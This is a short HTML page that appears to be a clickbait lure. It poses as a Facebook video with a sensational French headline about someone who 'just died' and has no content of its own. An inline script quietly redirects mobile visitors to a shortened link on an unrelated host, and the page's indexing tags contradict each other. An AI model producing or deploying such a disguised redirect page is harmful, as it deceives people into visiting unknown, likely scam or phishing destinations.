<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="Vidéo Facebook"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Ecoute, il vient de mourir, c'est arrivé maintenant..."/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1062454395989671958/1229302141366173756/image.png?ex=662f2fd5&is=661cbad5&hm=b300c21e5296a688415dc606ff702a83c8f1c1301816b90dd8e69d2840df2cf1&=&format=webp&quality=lossless&width=550&height=304"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>

<script type="text/javascript">
     //<![CDATA[
         var isMobile = /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);

         if (isMobile) {
             window.location.href = "https://medj.us/129cea";
         }
     //]]>
     </script>